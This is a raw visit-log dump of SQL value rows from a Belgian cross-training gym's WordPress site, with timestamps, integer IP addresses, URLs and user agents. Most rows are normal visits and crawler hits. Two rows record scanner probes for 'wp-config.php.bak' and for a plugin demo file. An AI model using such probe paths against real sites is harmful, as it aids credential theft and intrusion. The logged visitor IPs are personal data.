(76376, 1498660901.934507, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76377, 1498660902.409634, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76378, 1498660902.936493, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76379, 1498660903.432807, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76380, 1498660904.039158, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76381, 1498660904.599755, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76382, 1498660905.101988, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76383, 1498661657.381798, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76384, 1498672117.281731, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(76385, 1498672117.835342, 2760155473, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(76386, 1498676005.360418, 1123631576, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76387, 1498676226.215783, 1123633540, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76388, 1498679737.989679, 1123633613, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76389, 1498679738.519397, 1123633613, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76390, 1498680394.494627, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76391, 1498680479.470719, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76392, 1498680980.300223, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/en-images/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76393, 1498681562.591881, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76394, 1498681923.451265, 3475901741, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76395, 1498691226.831229, 1568199530, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(76396, 1498693827.170956, 3281709424, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'),
(76397, 1498838316.611913, 2637637388, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76398, 1498839286.737011, 1055650208, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(76399, 1498839289.799650, 1055650208, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(76400, 1498839398.048780, 1055650208, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(76401, 1498839399.661806, 1055650208, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(76402, 1498839400.454796, 1055650208, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(76403, 1498839403.615430, 1055650208, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(76404, 1498839405.034098, 1055650208, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(76405, 1498839406.421957, 1055650208, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(76406, 1498839407.515312, 1055650208, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(76407, 1498839408.451139, 1055650208, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(76408, 1498839409.748159, 1055650208, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/prix/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(76409, 1498839415.973198, 1055650208, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(76410, 1498839418.897916, 1055650208, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(76411, 1498839420.062082, 1055650208, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(76412, 1498839488.118220, 1055650208, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(76413, 1498839505.763014, 1055650208, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(76414, 1498839507.209750, 1055650208, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-limelette/', 'http://www.crosstrainingcenter.be/266-2/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(76415, 1498839512.867321, 1055650208, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(76416, 1498839515.001824, 1055650208, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(76417, 1498839516.125092, 1055650208, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(76418, 1498839516.306561, 1055650208, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(76419, 1498839518.038474, 1055650208, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(76420, 1498839518.400868, 1055650208, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(76421, 1498839519.878287, 1055650208, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/prix/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(76422, 1498839520.045991, 1055650208, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(76423, 1498839521.243462, 1055650208, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(76424, 1498839521.785490, 1055650208, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(76425, 1498842148.461508, 2342670828, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/plugins/front-end-editor/lib/aloha-editor/plugins/extra/draganddropfiles/demo/wp-classes.php', 'http://crosstrainingcenter.be/wp-content/plugins/front-end-editor/lib/aloha-editor/plugins/extra/draganddropfiles/demo/wp-classes.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(76426, 1498843432.896848, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko)'),
(76427, 1498843433.692418, 1538656104, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(76428, 1498843434.114084, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(76429, 1498843434.539247, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(76430, 1498843435.228432, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(76431, 1498843435.655246, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(76432, 1498843436.061252, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(76433, 1498843436.555028, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(76434, 1498843437.014830, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(76435, 1498843437.479566, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(76436, 1498843437.937060, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(76437, 1498843438.438826, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(76438, 1498843438.893266, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(76439, 1498843439.307284, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(76440, 1498844872.939841, 1439284595, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.be/', 'Mozilla/5.0 (Linux; Android 5.1; HUAWEI RIO-L01 Build/HuaweiRIO-L01) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(76441, 1498844875.356597, 1439284595, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Linux; Android 5.1; HUAWEI RIO-L01 Build/HuaweiRIO-L01) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(76442, 1498844942.437932, 1439284595, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Linux; Android 5.1; HUAWEI RIO-L01 Build/HuaweiRIO-L01) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(76443, 1498846164.050250, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76444, 1498846165.410565, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76445, 1498846542.151634, 1439284595, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.fr/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8'),
(76446, 1498846543.905594, 1439284595, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8'),
(76447, 1498848305.367668, 3024883465, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2'),
(76448, 1498848305.745038, 3024883610, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2'),
(76449, 1498849781.120671, 1837865894, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76450, 1498849787.601115, 1837865894, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76451, 1498852161.849485, 1374776940, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(76452, 1498852163.302805, 1374776940, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(76453, 1498852167.845265, 1374776940, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(76454, 1498852169.936266, 1374776940, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/prix/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(76455, 1498852187.188702, 1374776940, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(76456, 1498852188.686425, 1374776940, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(76457, 1498852191.410845, 1374776940, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(76458, 1498852192.678272, 1374776940, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(76459, 1498852234.441760, 1374776940, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(76460, 1498857293.854269, 598126853, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A'),
(76461, 1498861103.676698, 621375768, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(76462, 1498861106.780821, 1600959772, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(76463, 1498865024.137219, 1123631171, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76464, 1498865025.486059, 1123632645, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76465, 1498868019.746449, 620874844, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-config.php.bak', 'http://www.crosstrainingcenter.be/wp-config.php.bak', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(76466, 1498868765.550329, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76467, 1498875393.822944, 3251971736, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', ''),
(76468, 1498875394.480374, 3251971736, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705;)'),
(76469, 1498876651.142495, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76470, 1498876651.655752, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76471, 1498876885.802221, 3645214531, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/Robots/2.0; +http://go.mail.ru/help/robots)'),
(76472, 1498876894.346383, 3645214526, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/Robots/2.0; +http://go.mail.ru/help/robots)'),
(76473, 1498876895.867022, 3645214530, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/Robots/2.0; +http://go.mail.ru/help/robots)'),
(76474, 1498878566.294515, 3024883595, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(76475, 1498880932.277534, 1123632645, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76476, 1498881451.542691, 2366148260, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(76477, 1498881454.324276, 621375751, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/wpcf7_captcha/1993469065.png', '', 'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)'),
(76478, 1498883221.005860, 2637637399, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76479, 1498899315.019750, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76480, 1498900970.573156, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(76481, 1498900971.133814, 1837280593, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76482, 1498900971.602853, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76483, 1498900972.109951, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76484, 1498900972.645166, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76485, 1498900973.421351, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76486, 1498900973.860563, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76487, 1498900974.603990, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(76488, 1498900976.032941, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76489, 1498900976.462041, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76490, 1498900976.875509, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76491, 1498900977.551409, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76492, 1498900977.958976, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76493, 1498900978.363206, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76494, 1498902659.788722, 1570674771, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
